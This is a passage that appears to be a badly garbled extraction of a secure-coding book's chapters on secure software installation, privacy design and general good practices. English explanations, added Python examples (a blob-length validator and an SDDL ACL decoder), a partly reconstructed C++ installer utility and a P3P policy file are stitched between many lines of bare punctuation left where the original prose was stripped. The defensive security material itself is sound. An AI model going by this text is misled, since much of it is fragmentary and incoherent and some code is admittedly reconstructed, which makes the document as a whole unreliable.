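The following Python module, added here as an example and not code from the book, makes the point about Size concrete: it serializes the `struct blob` layout as a 4-byte little-endian length followed by the data, and contrasts a parser that believes the length field with one that validates it against the bytes actually present and against a ceiling. The sample messages are constructed; the function names and the MAX_BLOB limit are this example's own.

```python
"""Parse length-prefixed blobs without trusting the length field.

Added example (not from the book): `struct blob` above carries a DWORD
Size and the data it describes; serialized, that is a 4-byte little-endian
length followed by Size bytes. The naive parser below takes Size at face
value, which in C is an over-read of Size bytes; the checked parser
verifies Size against the bytes actually present and against a policy
ceiling before touching the data. The sample messages are constructed;
the names and the MAX_BLOB limit are this example's own.
"""
import struct
from typing import List

MAX_BLOB = 1 << 20   # hypothetical policy: no single blob over 1 MiB


class MalformedBlob(ValueError):
    """Raised by the checked parser when a length field cannot be honoured."""


def encode_blobs(blobs: List[bytes]) -> bytes:
    """Serialize: [Size][Data] for each blob, Size a little-endian DWORD."""
    return b"".join(struct.pack("<I", len(b)) + b for b in blobs)


def parse_blobs_naive(buf: bytes) -> List[bytes]:
    """What the buggy C code does: believe Size and copy that many bytes.

    Python slicing silently truncates, so the symptom here is wrong output;
    memcpy(dst, Data, Size) in C reads Size bytes past the end of the message.
    """
    out, pos = [], 0
    while pos + 4 <= len(buf):
        (size,) = struct.unpack_from("<I", buf, pos)
        pos += 4
        out.append(buf[pos:pos + size])
        pos += size
    return out


def parse_blobs_checked(buf: bytes) -> List[bytes]:
    """Validate Size against what was actually received before using it."""
    out, pos = [], 0
    while pos < len(buf):
        remaining = len(buf) - pos
        if remaining < 4:
            raise MalformedBlob(f"{remaining} stray byte(s) at offset {pos}: header truncated")
        (size,) = struct.unpack_from("<I", buf, pos)
        pos += 4
        if size > MAX_BLOB:
            raise MalformedBlob(f"blob at offset {pos - 4} claims {size} bytes, limit is {MAX_BLOB}")
        if size > len(buf) - pos:
            raise MalformedBlob(f"blob at offset {pos - 4} claims {size} bytes, only {len(buf) - pos} remain")
        out.append(buf[pos:pos + size])
        pos += size
    return out


# Constructed messages: one well formed, one with a Size of 0xFFFFFFFF.
GOOD_MESSAGE = encode_blobs([b"hello", b"", b"world!"])
BAD_MESSAGE = struct.pack("<I", 0xFFFFFFFF) + b"abc"

if __name__ == "__main__":
    print(parse_blobs_checked(GOOD_MESSAGE))
    print("naive:", parse_blobs_naive(BAD_MESSAGE))
    try:
        parse_blobs_checked(BAD_MESSAGE)
    except MalformedBlob as e:
        print("checked:", e)
```

The two checks are deliberately separate: the ceiling stops a single 4 GB claim from turning into an allocation, and the remaining-bytes check stops a smaller but still false claim from reading past the message; a C reader needs both, in that order, before the copy.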
Chapter 21. Secure Software Installation
,
,
. ,
, ,
DoS,
,
.
,
. ,
.
, . ,
Windows 2000 ( ) Windows NT 4
Security Configuration Editor,
.
Internet
Security Scanner Internet Security Systems.
UNIX Windows NT, ,
.
.
, ,
,
DoS. ,
,
;
. ,
, ,
, , ,
.
, Windows 2000
.
,
, .
, ,
Windows 2000 ( ).
,
.
,
, CREATOR OWNER ().
?
.
,
.
. ,
HKEY_CUR
RENT_USER, HKEY_LOCAL_MACHINE.
, .
,
?
?
A classic example is the Systems Management Server (SMS) Remote Agent, which installed its files with permissions that let ordinary users replace them; because the agent ran as Local System, replacing a file gave the user Local System privileges (see http://www.microsoft.com/technet/security/bulletin/fq00012.asp). The lesson: if a privileged component loads code or reads configuration at run time, the installer must set an ACL on it so that only administrators can change it.
Windows NT 4.0's AeDebug registry key, which names the debugger to launch when a process crashes, was writable by ordinary users. Crash a privileged process and your chosen "debugger" runs with its privileges (http://www.microsoft.com/TechNet/security/bulletin/fq00008.asp). Could this have been prevented? Yes, simply by setting the ACL on the key at installation.
What about a service that runs as Local System but only does harmless things; is a weak ACL on its data merely a DoS? No, and the SNMP service shows why (see http://www.microsoft.com/TechNet/security/bulletin/fq00096.asp). SNMP (Simple Network Management Protocol) already has a poor reputation (it is sometimes expanded as Security Not My Problem) because its authentication is a community string sent in the clear, so anyone with a sniffer on the segment can read it. But the Windows service also stored its community strings and configuration under a Parameters registry key with weak permissions, so a local user could read the community strings and change the configuration, including which SNMP SET operations were allowed, without any sniffing at all. Correct ACLs at installation would have prevented it.
(
)
. , ,
, . ,
, .
:
.
,
. ,
(, ),
.
. ,
,
. ,
, .
. ,
Do not assume the defaults are good enough. Program Files has a sensible ACL on NTFS (ordinary users cannot write to it), but that means nothing if the user chooses another directory at install time, and if the application is installed on a FAT volume there is no ACL at all. Decide what protection your files need and set it explicitly, checking the result rather than hoping for inheritance.
!
, .
, ,
.
, ,
,
.
, ,
[ Task Mana
ger ( )], .
, ,
!
Using the Security Configuration Editor

The Security Configuration Editor first shipped in Service Pack 4 for Windows NT 4 and is built into Windows 2000. It lets an installer apply a declarative security template rather than call the security API directly, which is both easier and easier to review. It runs as Microsoft Management Console (MMC) snap-ins. The example below secures a registry key under HKEY_LOCAL_MACHINE\Software and an installation directory. Open MMC and add the Security Templates and Security Configuration and Analysis snap-ins (Figure 21-1). The first manages templates; the second applies a template to a security database and then to the machine. In Security Templates, right-click the %SystemRoot%\Security\Templates path and choose New Template. Call the template null, since it will contain nothing but the entries you add (Figure 21-2).
. 211. / Security
Templates Security Configuration And Analysis
. 212.
MMC null
.
In Security Configuration and Analysis, choose Open Database, give a new database name such as NewApp.sdb, and use Import Template to import the null template (Figure 21-3). Then, in the Registry node of the template, choose Add Key to add the key whose ACL you want to set, and set the permissions in the dialog that follows (Figure 21-4). Do the same under File System for the installation directory. Saving the template produces an .inf file like the one below.
. 214.
[Unicode]
Unicode=yes
[Registry Values]
[Registry Keys]
"MACHINE\SOFTWARE\NewApp",0,"D:PAR(A;OICI;KA;;;BA)(A;CI;CCSWRC;;;WD)"
[File Security]
"E:\NewApp",0,"D:AR(A;OICI;FA;;;BA)(A;OICI;0x1f00e9;;;WD)"
[Version]
signature="$CHICAGO$"
Revision=1
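The security descriptor strings in the template are SDDL, and a reviewer should be able to read them. The following Python module, added here as an example and not code from the book, parses the two strings above into ACEs, expands the rights codes with their registry-key and file meanings, and flags any ACE that grants a write-class right to Everyone (WD). Run on the template it reports that the registry ACE gives Everyone only KEY_QUERY_VALUE, KEY_ENUMERATE_SUB_KEYS and READ_CONTROL, as intended, but that the file mask 0x1f00e9 gives Everyone DELETE, WRITE_DAC, WRITE_OWNER and FILE_DELETE_CHILD as well as read and execute; a read-and-execute mask would be 0x1200A9 (FILE_GENERIC_READ | FILE_GENERIC_EXECUTE), so that value deserves a second look before the template ships. All helper names are this example's own.

```python
"""Decode the DACLs in the security template above.

Added example (not from the book): it parses the SDDL security descriptor
strings from the .inf into ACEs, expands the rights codes (with the
registry-key and file meanings of the object-specific bits) and flags
ACEs that grant write-class rights to Everyone (WD), the kind of weak ACL
this chapter warns about. All names here are this example's own; the two
strings below are copied from the .inf.
"""
import re
from typing import Dict, List, NamedTuple, Tuple

REGISTRY_SDDL = "D:PAR(A;OICI;KA;;;BA)(A;CI;CCSWRC;;;WD)"
FILE_SDDL = "D:AR(A;OICI;FA;;;BA)(A;OICI;0x1f00e9;;;WD)"

# Two-letter rights codes: generic and standard rights, the composite file
# and registry masks, and the object-specific low bits.
RIGHTS_CODES: Dict[str, int] = {
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
    "SD": 0x00010000, "RC": 0x00020000, "WD": 0x00040000, "WO": 0x00080000,
    "FA": 0x001F01FF, "FR": 0x00120089, "FW": 0x00120116, "FX": 0x001200A0,
    "KA": 0x000F003F, "KR": 0x00020019, "KW": 0x00020006, "KX": 0x00020019,
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10,
    "WP": 0x20, "DT": 0x40, "LO": 0x80, "CR": 0x100,
}
STANDARD_BITS = {0x10000: "DELETE", 0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC",
                 0x80000: "WRITE_OWNER", 0x100000: "SYNCHRONIZE"}
SPECIFIC_BITS = {
    "registry": {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
                 0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK"},
    "file": {0x1: "FILE_READ_DATA", 0x2: "FILE_WRITE_DATA", 0x4: "FILE_APPEND_DATA",
             0x8: "FILE_READ_EA", 0x10: "FILE_WRITE_EA", 0x20: "FILE_EXECUTE",
             0x40: "FILE_DELETE_CHILD", 0x80: "FILE_READ_ATTRIBUTES",
             0x100: "FILE_WRITE_ATTRIBUTES"},
}
# Rights that let the holder change the object or its protection.
WRITE_CLASS = {
    "registry": 0x2 | 0x4 | 0x20 | 0x10000 | 0x40000 | 0x80000 | 0x10000000 | 0x40000000,
    "file": 0x2 | 0x4 | 0x10 | 0x40 | 0x100 | 0x10000 | 0x40000 | 0x80000
            | 0x10000000 | 0x40000000,
}
ACE_RE = re.compile(r"\(([^;)]*);([^;)]*);([^;)]*);([^;)]*);([^;)]*);([^;)]*)\)")


class Ace(NamedTuple):
    ace_type: str   # A = access allowed, D = access denied, ...
    flags: str      # inheritance flags such as OI, CI
    mask: int
    trustee: str    # SDDL alias (BA, WD, SY, ...) or an S-1-... string


def parse_rights(text: str) -> int:
    """Rights are either a hex access mask or a run of two-letter codes."""
    if text.lower().startswith("0x"):
        return int(text, 16)
    if len(text) % 2:
        raise ValueError(f"odd-length rights string {text!r}")
    mask = 0
    for i in range(0, len(text), 2):
        code = text[i:i + 2]
        if code not in RIGHTS_CODES:
            raise ValueError(f"unknown rights code {code!r} in {text!r}")
        mask |= RIGHTS_CODES[code]
    return mask


def parse_dacl(sddl: str) -> Tuple[str, List[Ace]]:
    """Return (DACL control flags such as 'P' or 'AR', list of ACEs)."""
    m = re.search(r"D:([A-Z]*)", sddl)
    if not m:
        raise ValueError("no DACL (D:) in SDDL string")
    aces = [Ace(t, f, parse_rights(r), sid) for t, f, r, _og, _ig, sid in ACE_RE.findall(sddl)]
    return m.group(1), aces


def describe(mask: int, kind: str) -> List[str]:
    """Human-readable names for the bits set in an access mask."""
    names = [n for bit, n in SPECIFIC_BITS[kind].items() if mask & bit]
    names += [n for bit, n in STANDARD_BITS.items() if mask & bit]
    for code, label in (("GA", "GENERIC_ALL"), ("GX", "GENERIC_EXECUTE"),
                        ("GW", "GENERIC_WRITE"), ("GR", "GENERIC_READ")):
        if mask & RIGHTS_CODES[code]:
            names.append(label)
    return names


def everyone_can_write(aces: List[Ace], kind: str) -> List[Ace]:
    """Allow-ACEs that give Everyone (WD) any write-class right."""
    return [a for a in aces if a.ace_type == "A" and a.trustee == "WD" and a.mask & WRITE_CLASS[kind]]


if __name__ == "__main__":
    for label, sddl, kind in (("registry", REGISTRY_SDDL, "registry"), ("file", FILE_SDDL, "file")):
        flags, aces = parse_dacl(sddl)
        print(f"{label} DACL flags={flags or '-'}")
        for ace in aces:
            print(f"  {ace.ace_type} {ace.trustee:3s} {ace.mask:#010x} {describe(ace.mask, kind)}")
        print("  Everyone can write:", [a.trustee for a in everyone_can_write(aces, kind)])
```

The P flag on the registry DACL (protected) is worth noting too: it stops the key from inheriting ACEs from HKEY_LOCAL_MACHINE\SOFTWARE, which is what you want when you have set the permissions deliberately.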
In a real installer the directory is not known in advance (the template above hard-codes E:\NewApp), so put a placeholder such as %newapp_install% in the template and substitute the real path at install time. The following C++ program (see Secureco2\Chapter21\SecInstall) does exactly that: it reads the template, replaces every %newapp_install% with the directory given on the command line, and writes a new .inf.
/*
  Substitutes %newapp_install% in an INF template with the installation
  directory given on the command line and writes the result to a new
  .inf file, which can then be applied with the Security Configuration
  Editor.
*/
#define UNICODE
#include <windows.h>
#include <stdio.h>

/*
  A small handle wrapper. The destructor closes the handle, so every
  early return below releases it without repeating the cleanup code,
  which is where leaks usually hide.
*/
class SmartHandle
{
public:
    SmartHandle()
    {
        Handle = INVALID_HANDLE_VALUE;
    }
    ~SmartHandle()
    {
        if (IsValid())
        {
            CloseHandle(Handle);
        }
    }
    bool IsValid(void)
    {
        return Handle != INVALID_HANDLE_VALUE && Handle != NULL;
    }
    HANDLE Handle;
};

/*
  Why wmain rather than main? It delivers argv as UNICODE strings,
  which is what the wide-character file functions below expect.
*/
int wmain(int argc, WCHAR* argv[])
{
    SmartHandle hInput;
    SmartHandle hOutput;
    SmartHandle hMap;
    WCHAR* pFile;
    WCHAR* pTmp;
    WCHAR* pLast;
    DWORD filesize;
    DWORD dirlen;

    if (argc != 4)
    {
        wprintf(L"Usage: %s [input template]", argv[0]);
        wprintf(L" [output .inf] [installation directory]\n");
        return -1;
    }
    dirlen = (DWORD)wcslen(argv[3]);

    hInput.Handle = CreateFile(argv[1],
                               GENERIC_READ,
                               0,                     // no sharing while we read
                               NULL,                  // default security
                               OPEN_EXISTING,         // the template must exist
                               FILE_ATTRIBUTE_NORMAL,
                               NULL);
    if (!hInput.IsValid())
    {
        wprintf(L"Cannot open %s\n", argv[1]);
        return -1;
    }

    DWORD highsize = 0;
    filesize = GetFileSize(hInput.Handle, &highsize);
    if (highsize != 0 || filesize == ~0)
    {
        // An INF template of more than 4 GB? Something is wrong.
        wprintf(L"Input file %s is too large or unreadable\n", argv[1]);
        return -1;
    }

    // The creation of the output file is missing from the page; the call
    // below is a minimal reconstruction. CREATE_NEW refuses to overwrite
    // an existing file, so a planted file cannot be silently clobbered.
    hOutput.Handle = CreateFile(argv[2],
                                GENERIC_WRITE,
                                0,
                                NULL,
                                CREATE_NEW,
                                FILE_ATTRIBUTE_NORMAL,
                                NULL);
    if (!hOutput.IsValid())
    {
        wprintf(L"Cannot create %s\n", argv[2]);
        return -1;
    }

    // Map the template into memory so it can be searched as one string
    // instead of being read and reassembled piece by piece.
    hMap.Handle = CreateFileMapping(hInput.Handle,
                                    NULL,              // default security
                                    PAGE_READONLY,     // we only read it
                                    0,                 // map the whole file:
                                    0,                 //   high and low size 0
                                    NULL);             // no name needed
    if (!hMap.IsValid())
    {
        wprintf(L"Cannot map %s\n", argv[1]);
        return -1;
    }

    // Map a view of the whole file.
    pFile = (WCHAR*)MapViewOfFile(hMap.Handle,
                                  FILE_MAP_READ, 0, 0, 0);
    if (pFile == NULL)
    {
        wprintf(L"Cannot map a view of %s\n", argv[1]);
        return -1;
    }

    // Walk the template, copying the text before each %newapp_install%
    // and then the installation directory in its place. Note: wcsstr
    // needs a terminator; the unused remainder of the mapping's last
    // page is zero-filled, so a template that does not end exactly on a
    // page boundary is NUL-terminated in practice. Pad the file with a
    // NUL if that assumption is not acceptable.
    pTmp = pLast = pFile;
    DWORD subst_len = (DWORD)wcslen(L"%newapp_install%");
    while (1)
    {
        DWORD written, bytes_out;
        pTmp = wcsstr(pLast, L"%newapp_install%");
        if (pTmp != NULL)
        {
            // Write everything up to the token.
            bytes_out = (DWORD)((pTmp - pLast) * sizeof(WCHAR));
            if (!WriteFile(hOutput.Handle, pLast, bytes_out,
                           &written, NULL) || bytes_out != written)
            {
                wprintf(L"Cannot write to %s\n", argv[2]);
                UnmapViewOfFile(pFile);
                return -1;
            }
            // Write the installation directory in place of %newapp_install%.
            if (!WriteFile(hOutput.Handle, argv[3],
                           dirlen * sizeof(WCHAR), &written, NULL) ||
                dirlen * sizeof(WCHAR) != written)
            {
                wprintf(L"Cannot write to %s\n", argv[2]);
                UnmapViewOfFile(pFile);
                return -1;
            }
            pTmp += subst_len;
            pLast = pTmp;
        }
        else
        {
            // No more tokens: write the rest of the template.
            bytes_out = (DWORD)((BYTE*)pFile + filesize - (BYTE*)pLast);
            if (!WriteFile(hOutput.Handle, pLast, bytes_out,
                           &written, NULL) || bytes_out != written)
            {
                wprintf(L"Cannot write to %s\n", argv[2]);
                UnmapViewOfFile(pFile);
                return -1;
            }
            // The end of the program is missing from the page; the break
            // and the two lines after the loop are a minimal completion.
            break;
        }
    }
    UnmapViewOfFile(pFile);
    return 0;
}
Using the security API

If the template approach does not fit, the installer can set ACLs directly through the Win32 security API. Be aware of its history: the low-level functions date from Windows NT, and they are easy to misuse. AddAccessAllowedAce, for example, appends an access-allowed ACE to the end of the DACL; Windows expects deny ACEs to come before allow ACEs, so an ACL built by appending in the wrong order will not behave as intended, and you must use AddAce to place each ACE at the right position. (AddAccessAllowedAceEx, which also sets inheritance flags on the ACE, requires Windows 2000 or later.) A walk-through of the API is at http://www.windowsitsecurity.com/Articles/Index.cfm?ArticleID=9696; Windows 2000 added higher-level functions that are harder to get wrong. Two more points. Decide deliberately whether the DACL you apply replaces or merges with what is already there; both are sometimes right, and the default may not be what you expect. And do not confuse an empty DACL with no DACL: an empty DACL grants access to no one, while a NULL DACL grants everything to everyone, and an object created with a NULL DACL is the weakest ACL there is.
Windows Installer

If you ship a Windows Installer package, start with the Microsoft Platform SDK, which documents the installer tables and includes a section, Guidelines for Authoring Secure Installations, that covers most of what follows. Use the LockPermissions table to set ACLs on the files, directories and registry keys the package creates, rather than leaving them with whatever they inherit. Installer properties come in three kinds: private, public and restricted public. A public property can be set on the command line by whoever runs the installation, so anything security-relevant (a path the installer later trusts, a service account, a password) must not be a plain public property; make it private or restricted public, and do not carry secrets in properties at all if you can avoid it. Be careful with transforms: a transform can change any part of the package before it runs, including properties and custom actions, so an installation that accepts arbitrary transforms accepts arbitrary changes. Custom actions are the riskiest part of a package. They run code of your own, often with elevated privilege, and the installer cannot validate what they do; keep them small, and review them as you would any privileged code. A custom action marked msidbCustomActionTypeNoImpersonate runs as the Local System account rather than as the installing user; use that flag only where the action genuinely needs it, since a bug in such an action is a bug in Local System. Finally, remember that the installer runs on the user's machine under the user's conditions: test the package as a non-administrator, on a hardened machine, and against the templates of Chapter 19, exactly as you test the application itself.
Chapter 22. Building Privacy into Your Application
* (privacy)
. ,
.
,
,
, ,
.
, ,
.
, , ,
, .
!
. ,
.
, Porsche
? ,
. .
. ,
, ,
* . . .
.
, ,
.
, .
,
. ,
. ,
. :
,
.
. ,
,
,
. :
. , .
.
.
, Web
. ,
. , ,
.
,
.
, .
, .
. ,
.
,
Records, Computers and the Rights of Citizens (,
), ,
1973 . (http://aspe.hhs.gov/datacncl/1973privacy/
tocprefacemembers.htm). , ,
, . 1998 .
(personally identifiable information,
PII) ,
. PII .
.
, .
TCP/IP
PII, .
PII,
.
1998 . (http://
www.cdt.org/privacy/eudirective/EU_Directive_.html), ,
PII.
PII ,
.
, .
2000 .
,
. ,
, .
(Safe Harbor Principles, http://www.export.gov/safeharbor/)
,
. , ,
,
, .
, ,
, . Web
(privacy statement),
.
, ,
.
, ,
, , ,
, Web ,
.
. ,
,
.
, ,
,
. ,
,
,
. ,
. , CRM (Customer Relationship Mana
gement ),
(,
). ,
.
.
. ,
.
,
.
,
.
, ,
.
, ,
,
, .
,
.
, .
.
. ,
.
,
. ,
.
.
Web .
, .
, .
,
. . 221 ,
: BBBOnline (http://www.bbbonline.com), ESRB (http://
www.esrb.org/wp_join.asp) TRUSTe (http://www.truste.org/programs/ pub_how_to_
join.html).
. 221.
.
. 222
.
Table 22-1. Some United States legislation affecting privacy

Computer Fraud and Abuse Act (CFAA): unauthorized access to computers and data; http://www4.law.cornell.edu/uscode/18/1030.html
Gramm-Leach-Bliley Act (GLBA): how financial institutions handle customers' personal data; http://www.senate.gov/~banking/conf/
Health Insurance Portability and Accountability Act (HIPAA): protection of health information; http://cms.hhs.gov/hipaa/
Children's Online Privacy Protection Act (COPPA): collection of personal information from children under 13; http://www.ftc.gov/opa/1999/9910/childfinal.htm
,
.
, .
, , ,
.
.
.
, ,
. PII, ,
.
, . ,
,
. , :
;
;
;
,
;
:
Web;
;
.
(Chief Privacy Officer, CPO)
(privacy advocate) .
.
(Council of Chief Privacy Officers, http://www.conference
board.org/search/ dcouncil.cfm?councilsid=173) .
. 222
. CPO ,
.
, CPO
, .
. 222.
CPO ,
.
.
, , ,
.
, ,
. CPO
,
,
.
, CPO.
, ,
.
:
;
;
;
,
;
;
,
.
,
Web ,
.
. ,
. ,
. , ,
, ,
. , ,
, .
,
.
, ,
(. 223).
, , ,
.
Web, ,
P3P (Platform for Privacy
Preferences) ( ). ,
cookie, ,
, , ,
.
.
,
,
. (,
) ,
.
.
,
SQM cookie-
. 223.
P3P
.
,
. ,
, .
.
,
.
1.
,
,
. ,
. ,
. . .
, .
,
:
;
;
;
;
;
, ,
;
;
?
1.1.
,
: Web?
, ,
. ,
? , ?
, , .
1.2 Web-
Web,
: Web ?
?
? cookie,
. ,
.
. Web P3P?
, .
,
.
.
. ,
, .
Secureco2\Chapter22.
Web .
, .
,
,
. ,
.
.
,
. Web
TRUSTe (http://www.truste.org/ bus/pub_resourceguide.html)
, .
Microsoft http:/
/www.microsoft.com/info/privacy.htm.
P3P
Platform for Privacy Preferences (P3P) (http://www.w3.org/P3P) ,
W3C (World Wide Web Consortium)
Web ,
. ?
Internet Explorer 6,
(. 224).
P3P.
. 224.
Internet Explorer 6
, Web
.
, .
cookie .
P3P Web. Web
P3P ,
(Medium) . P3P
(.
P3P).
.
.
. ,
,
.
.
P3P
, P3P Web.
, P3P, ,
. 225.
P3P
Web, P3P, ,
. 226. , .
TRUSTe
.
. 226.
P3P
P3P
. XML
. P3P.xml W3C,
Web. , Microsoft
http://www.microsoft.com/w3c/p3p.xml. :
<META xmlns="http://www.w3.org/2000/12/p3pv1">
  <POLICY-REFERENCES>
    <POLICY-REF about="Policy.xml">
      <INCLUDE>/*</INCLUDE>
      <COOKIE-INCLUDE name="*" value="*" domain="*" path="*"/>
    </POLICY-REF>
  </POLICY-REFERENCES>
</META>
Web, Internet Explo
rer 6 W3C Web, P3P.xml,
POLICYREF, XML
. ,
. .
XML .
discuri Web.
Internet Explorer 6 here.
Internet Explorer 6 .
Web
, .
. Web
, .
.
http://www.w3.org P3P.
<POLICY xmlns="http://www.w3.org/2000/12/p3pv1"
        discuri="policy.htm"
        opturi="http://msdn.microsoft.com/privacy">
  <ENTITY>
    <DATA-GROUP>
      <DATA ref="#business.name">Microsoft</DATA>
      <DATA ref="#business.contact-info.postal.street">One Microsoft Way</DATA>
      <DATA ref="#business.contact-info.postal.city">Redmond</DATA>
      <DATA ref="#business.contact-info.postal.stateprov">WA</DATA>
      <DATA ref="#business.contact-info.postal.postalcode">78052</DATA>
      <DATA ref="#business.contact-info.postal.country">USA</DATA>
      <DATA ref="#business.contact-info.online.email">michael</DATA>
      <DATA ref="#business.contact-info.telecom.telephone.intcode">1</DATA>
      <DATA ref="#business.contact-info.telecom.telephone.loccode">425</DATA>
      <DATA ref="#business.contact-info.telecom.telephone.number">8828080</DATA>
    </DATA-GROUP>
  </ENTITY>
  <ACCESS><nonident/></ACCESS>
  <STATEMENT>
    <PURPOSE><admin/><develop/></PURPOSE>
    <RECIPIENT><ours/></RECIPIENT>
    <RETENTION><stated-purpose/></RETENTION>
    <DATA-GROUP>
      <DATA ref="#dynamic.clickstream.server"/>
      <DATA ref="#dynamic.http.useragent"/>
    </DATA-GROUP>
  </STATEMENT>
  <STATEMENT>
    <PURPOSE><pseudo-analysis required="opt-in"/></PURPOSE>
    <RECIPIENT><other-recipient/></RECIPIENT>
    <RETENTION><indefinitely/></RETENTION>
    <DATA-GROUP>
      <DATA ref="#user.home-info.postal.postalcode">
        <CATEGORIES><demographic/></CATEGORIES>
      </DATA>
    </DATA-GROUP>
  </STATEMENT>
</POLICY>
Web, ,
. Internet Explo
rer 6 Privacy Report
View. Web
. , TRUSTe (http://www.truste.org/bus/pub_re
sourceguide.html).
. 227.
Internet Information Services (IIS)
. ,
Internet Explorer 6 ,
.
XML, ,
P3P. ( http://www.w3.org/TR/P3P/#compact_policies).
. 227 XML.
P3P
. P3P Web
(http://msdn.microsoft.com/workshop/security/privacy/
overview/createprivacypolicy.asp).
, ,
, ,
.
. ,
Web, .
Help (),
.
(software
development kit, SDK), Privacy Policy (
) , ,
, Web. Privacy Settings
( ) DLL,
, SDK.
. 228
Microsoft Windows Media Player 9 beta,
.
. 228.
Privacy Options
, ,
.
, ?
CRM.
. ,
?
,
, (. 2210).
. 229.
. 2210.
, Web,
, .
, ,
?
, ,
,
.
, . ,
, .
, ! (:
!) , ,
, Web , ,
.
. ,
:
.
, ,
HCKU
.
Windows Media Player 7 ,
DVD Microsoft. :
,
. , , ,
, , .
,
, .
, ,
, .
,
,
.
,
.
, : ,
?
.
,
: ?
, ,
,
. , ,
, , .
,
.
,
, . ,
,
.
.
. ,
,
. ,
. ,
. . . 2211 ,
,
. , ,
.
. 2211.
,
.
. ,
.
. , .
: ,
, , .
,
,
.
,
.
,
. , .
?
; ,
.
: ,
. ?
,
?
, . ,
. ,
, , . ,
,
.
, ,
.
. 2212 ,
.
SSL/TLS Web. Web
, IPSec.
,
. .
,
EDI (Electronic Data Interchange)
, .
.
. ,
.
.
IPSec
IPSec
EDI
SSL/TLS
Web-
SSL/TLS
. 2212.
,
, .
,
.
.
,
. , ,
. ,
,
.
Chapter 23. General Good Practices

This chapter collects practices that do not fit neatly elsewhere but that come up in review after review.

Don't tell the attacker anything

Error messages serve users and attackers alike. A message such as "cannot open stuff.txt in c:\secretstuff\docs" tells an attacker a path, a file name and the fact that the file exists, and an error that differs depending on whether a user name is valid tells him which accounts to attack. Tell the user what went wrong in terms they can act on, write the details to a log that only administrators can read, and keep the two apart. The same goes for banners, version strings and stack traces sent to the client: every detail you give away is one the attacker no longer has to guess.
, UNIX, Microsoft
Windows NT .
,
. ?
,
Microsoft Windows ,
.
. ,
, SYSTEM,
. ,
, .
Windows
; , ,
, .
, ,
. Windows
.
,
, , .
,
, .
A service running as SYSTEM that interacts with the user's desktop (through OpenWindowStation and GetThreadDesktop, or by ticking "Allow service to interact with desktop" under Log On As in the Services tool, which sets the 0x0100 bit in HKLM\CCS\Services\MyService\Type) is exposed to every application on that desktop: window messages from an unprivileged program reach a window procedure running as SYSTEM. Do not do it. If a service must communicate with the logged-on user, use RPC, COM or a named pipe with a proper ACL, or MessageBox with MB_SERVICE_NOTIFICATION for the rare notification, and bind any local-only socket to 127.0.0.1 with access checks of its own. Likewise, never have a service LoadLibrary and GetProcAddress a module chosen by the user, and if a service has to start a program on the user's desktop, do not CreateProcess it as SYSTEM with STARTUPINFO.lpDesktop set to Winsta0\Default; use CreateProcessAsUser with the user's token, so the new process runs as the user.

More generally, do not run as LocalSystem unless you need to, and "need" is rarer than it seems. On Windows 2000 some APIs that appear to require it do not (LogonUser needs the SE_TCB_NAME privilege on Windows 2000 but not on Windows XP, for instance), and a service that holds LocalSystem only to call one such function has paid a high price for it. LocalSystem has every privilege on the machine and, on the network, the machine's own credentials; a bug in a LocalSystem service is a complete compromise of the host. Prefer the least privileged account that works.
Network Service ( ) ,
Windows XP. ,
LocalSystem. LocalSystem,
( , ,
).
.
.
LocalService
LocalService Network Service,
. ,
. LocalSystem,
.
,
, , . ,
, ,
.
. ( )
Internet Security Systems, ,
. ,
Windows NT. ,
, .
,
,
.
,
,
.
, , ,
.
Even secrets the operating system protects on your behalf are reachable by anyone who is already an administrator: Todd Sabin's Lsadump2 (from BindView) dumps LSA secrets by running code inside lsass, where they are held in the clear. That does not make the protection useless, but it does frame the question correctly. It is not only "how do I protect this secret?" but "do I need to hold it at all?"; a secret you do not store cannot be dumped.
,
.
.
,
, , ,
. ,
.
, ,
.
,
,
. ,
.
.
,
, ; ,
,
.
.
,
, .
.
, . ,
, ,
.
, .
.
, ,
, ,
. , Web
Server:. , ,
.
.
, .
For IIS 5 the URLScan tool (http://www.microsoft.com/windows2000/downloads/recommended/urlscan/default.asp) rejects requests for extensions and verbs you do not serve, before they reach any handler. That removes both the attack surface and the information leak. Without it, a request for a non-existent Splat.htr is routed to Ism.dll, the handler for .htr files, which answers "Error: The requested file could not be found"; that wording is specific to Ism.dll, so the attacker now knows HTR is enabled. With the extension unmapped, the Web server returns an ordinary 404 and reveals nothing.
Everything in Chapter 19 about testing applies to the component kinds discussed below; the difference is what a failure costs.

Kernel-mode drivers

A driver runs in the most trusted context there is, and its bugs have the worst consequences. A user-mode bug in process A cannot affect process B, but a driver bug affects every process on the machine, and the attacker needs only to be able to open the device. Test with Driver Verifier, which checks a driver's interactions with Ntoskrnl.exe and Hal.dll (pool usage, IRQL, I/O handling), and review against the following points, which draw on the Windows DDK documentation.

Use the safe string functions. Strsafe.h (Chapter 5) has a kernel counterpart, NTStrsafe.h, in the Windows XP SP1 DDK (http://www.microsoft.com/ddk/relnoteXPsp1.asp).

Create device objects with FILE_DEVICE_SECURE_OPEN, so that the device's security descriptor is applied when a caller opens a name under the device (\Device\Foo\anything) and not only the device itself; a device that protects only its root is open to anyone who appends a name.

Put a DACL on the device object. The usual way is an AddReg entry in the [ClassInstall32] or [DDInstall.HW] section of the INF; WHQL (Windows Hardware Quality Labs) checks the INF, so that is the place to do it. For raw devices (legacy devices that are not set up through Plug and Play) use IoCreateDeviceSecure (in the DDK for Microsoft Windows .NET Server 2003 and Windows XP SP1); on Windows 2000 the same function is available through Wdmsec.h and the Wdmsec library.

Define IOCTLs with the access they actually require, not FILE_ANY_ACCESS, which lets any caller who could open the device issue the control. Where a legacy IOCTL must stay FILE_ANY_ACCESS, call IoValidateDeviceIoControlAccess (Wdmsec.h on Windows 2000) to check the caller's access yourself.

Windows Management Instrumentation (WMI) classes exposed by a driver are a second entry point. On Windows XP the WMI GUIDs a driver registers are accessible to everyone by default; Windows .NET Server 2003 is more restrictive. Secure them explicitly with a [DDInstall.WMI] section (DDK for Windows .NET Server 2003 and Windows XP SP1) whose AddReg entries carry an SDDL string.
